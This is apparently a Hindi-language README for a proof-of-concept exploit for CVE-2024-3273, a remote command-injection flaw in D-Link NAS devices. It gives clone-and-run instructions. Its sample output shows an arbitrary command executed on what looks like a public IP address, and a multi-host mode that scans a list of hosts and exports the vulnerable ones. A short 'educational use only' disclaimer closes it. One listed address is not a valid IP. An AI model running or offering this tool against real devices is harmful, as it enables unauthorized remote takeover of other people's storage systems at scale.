
CVE-2024-3273 के लिए शोषण, एकल और एकाधिक होस्ट का समर्थन करता है
इस रिपॉजिटरी में CVE-2024-3273 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो D-Link NAS उपकरणों में पाई गई एक सुरक्षा भेद्यता है। यह भेद्यता हमलावरों को असुरक्षित उपकरणों पर मनमाने कमांड निष्पादित करने की अनुमति देती है।
CVE-2024-3273 D-Link NAS उपकरणों में एक भेद्यता है, जो दूरस्थ हमलावरों को cgi-bin/nas_sharing.cgi एंडपॉइंट पर एक क्राफ्टेड HTTP अनुरोध के माध्यम से मनमाने कमांड निष्पादित करने की अनुमति देती है।
यह PoC दर्शाता है कि भेद्यता का उपयोग करके असुरक्षित D-Link NAS उपकरणों पर कमांड कैसे निष्पादित किए जा सकते हैं।
requests लाइब्रेरीइस रिपॉजिटरी को क्लोन करें:
git clone https://github.com/adhikara13/CVE-2024-3273.git
रिपॉजिटरी निर्देशिका पर जाएँ:
cd CVE-2024-3273
PoC चलाएँ:
python main.py
लक्ष्य उपकरण चुनने के लिए ऑन-स्क्रीन निर्देशों का पालन करें:
host:port प्रारूप में कई लक्ष्य उपकरणों वाली एक फ़ाइल प्रदान करें, और चुनें कि क्या असुरक्षित होस्ट को vulnerables.txt में निर्यात करना है।┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
यह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से करें और केवल उन उपकरणों पर करें जिनका परीक्षण करने के लिए आप अधिकृत हैं।
योगदान का स्वागत है! यदि आपको कोई समस्या या सुधार मिलता है, तो बेझिझक एक issue खोलें या pull request बनाएं।